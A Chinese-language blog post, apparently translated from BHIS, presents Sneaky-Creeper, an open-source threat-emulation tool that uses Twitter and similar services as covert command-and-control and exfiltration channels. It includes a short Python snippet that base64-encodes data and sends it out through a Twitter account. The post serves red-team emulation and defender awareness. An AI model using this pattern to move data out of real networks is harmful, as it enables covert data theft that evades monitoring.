利用合法网络渠道实现C2通信:Sneaky-Creeper工具解析

本文介绍了攻击者如何利用Twitter等合法网络渠道进行命令与控制通信,并详细解析了开源工具Sneaky-Creeper的技术实现,包括数据编码和API集成,帮助防御者更好地理解现实威胁。

我们可以实现C2吗?是的,我们可以!

Dakota Nelson //

近年来,高级攻击者利用合法网络渠道进出网络传输数据的情况越来越普遍。Twitter和Tumblr等社交网络、Dropbox和Soundcloud等实用工具,甚至Salesforce和Google Docs等商业工具,都可以被用作命令与控制的渠道。威胁情报报告(如FireEye的报告)可以深入了解这些对手的策略、技术和程序,但它们无法提供网络防御者应对这类现实威胁所需的实践经验。

这就是新的攻击工具发挥作用的地方。

和BHIS的每个人一样,我热爱安全。对我来说,这转化为许多深夜敲代码的时光——比如开发Sneaky-Creeper,这是一个开源项目,旨在通过合法网络渠道实现简易通信,用于威胁模拟。

它被设计为可读且易于使用:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
from sneakers import Exfil
# 渠道实际移动数据
channel = "twitter"
# 编码器让你在发送数据前加密/编码/处理数据
encoders = ["b64"]
# 注意它们可以链式使用!
# 包含你将发布到的账户的API密钥和详细信息
twitter_params = {"key": "xxxx",
"secret": "xxxx",
"token": "xxxx",
"tsecret": "xxxx",
"name": "twitter_account_name"}
data = "whatever you'd like"
feed = Exfil(channel, encoders)
feed.set_channel_params({"sending": twitter_params, "receiving": twitter_params})
feed.send(data)
print(feed.receive())

Sneaky-Creeper由一个学生团队构建和维护,目前仍在开发中——虽然有些粗糙,但它不断被优化和改进,以提供一个强大的通信渠道来模拟高级攻击者的通信能力。如果你对非常规C&C方法感兴趣,请在Github上查看它!


更多内容请访问Dakota的博客Ungineers.com

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计